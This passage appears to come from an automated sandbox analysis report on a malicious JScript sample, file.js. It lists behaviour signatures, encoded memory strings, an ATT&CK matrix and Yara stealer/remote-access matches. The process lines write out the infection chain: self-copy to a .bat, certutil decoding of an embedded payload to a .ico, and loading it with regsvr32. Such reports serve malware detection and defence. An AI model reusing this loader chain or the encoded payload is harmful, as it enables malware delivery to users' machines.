                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2778Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 650Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 4.5 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep count: 2778 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep count: 650 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: wscript.exe, 00000000.00000003.1624787924.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1627801639.000002360BA31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624581776.000002360B939000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624662286.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626812055.000002360BB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1629087296.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626643177.0000023609BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624846199.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624919840.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000003.1639651754.000001F228648000.00000004.00000020.00020000.00000000.sdmp, file.js, deepdidacticfour.1.drBinary or memory string: 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
                  Source: wscript.exe, 00000000.00000003.1624787924.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1627801639.000002360BA31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624581776.000002360B939000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624662286.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626812055.000002360BB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1629087296.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626643177.0000023609BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624846199.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624919840.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000003.1639651754.000001F228648000.00000004.00000020.00020000.00000000.sdmp, file.js, deepdidacticfour.1.drBinary or memory string: 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tT0xTbmd6bG9WS0JuckNCZHBramZTSVVNeU9Ib2ZIQmdPUVlLZU1RV1hUTHJFVXNhWENWdbaSiJxqZFJvYkNIYXhIZm9oYWtXdE9zaGtac3RHT0dhcUhPbnNlUVhSVXBURHpFSHJTaUJzQ2lBUGhwRWt4a1lY4K9B3UlmT0dnaU1jT3FQcVFQR2N4WkNoYlJQd1FBS01QUk1ZbFV5dWhQSlljS1lCUFNjYXZMSFFrc1FGbmZvvw1XniW9jZttamNrcHpxSJu7u7dtWHd2YWZKd1ZPYWZ2bUJiVXZNcWFVRFVYWFBnkYycjkBtZ21BRVdjekF2cmRxU2J1UFpualB3UXJVcFhnakp4d0VaUnZVWXZ6b0NWbXpaZ3lHYUlCclhlUFhGVXJDTVpsQk1kZmdEWHdjbXh5a3FPQUFxR0FTUHBldEZBVW9PcVhGTElMcENpQ2JESVRcdURidVFpXHJJdWlUWllkV3llVUZwRkRRa1VMVXVoWk9zdUpJT09CWHBGSGR1eUdMR0pwdFZmZHp0Z1hlc3pXV0FvcExzdnhHVnlNY09tSUZMaVR4R0dSWndkV1ZXTG1nTUNTc2ZBT3dSd1V
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00007FFE102314B0
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguageJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "1033" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat"" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5460, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5460, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts1
                  Native API
                  221
                  Scripting
                  11
                  Process Injection
                  121
                  Masquerading
                  OS Credential Dumping1
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)11
                  Process Injection
                  Security Account Manager21
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417160 Sample: file.js Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 6 other signatures 2->39 8 wscript.exe 1 1 2->8         started        process3 signatures4 41 JScript performs obfuscated calls to suspicious functions 8->41 43 Wscript starts Powershell (via cmd or directly) 8->43 45 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->45 47 Suspicious execution chain found 8->47 11 cmd.exe 4 8->11         started        process5 file6 27 C:\Users\user\stiffrelievedawesome.bat, ASCII 11->27 dropped 49 Wscript starts Powershell (via cmd or directly) 11->49 15 certutil.exe 2 11->15         started        19 powershell.exe 7 11->19         started        21 WMIC.exe 1 11->21         started        23 3 other processes 11->23 signatures7 process8 file9 29 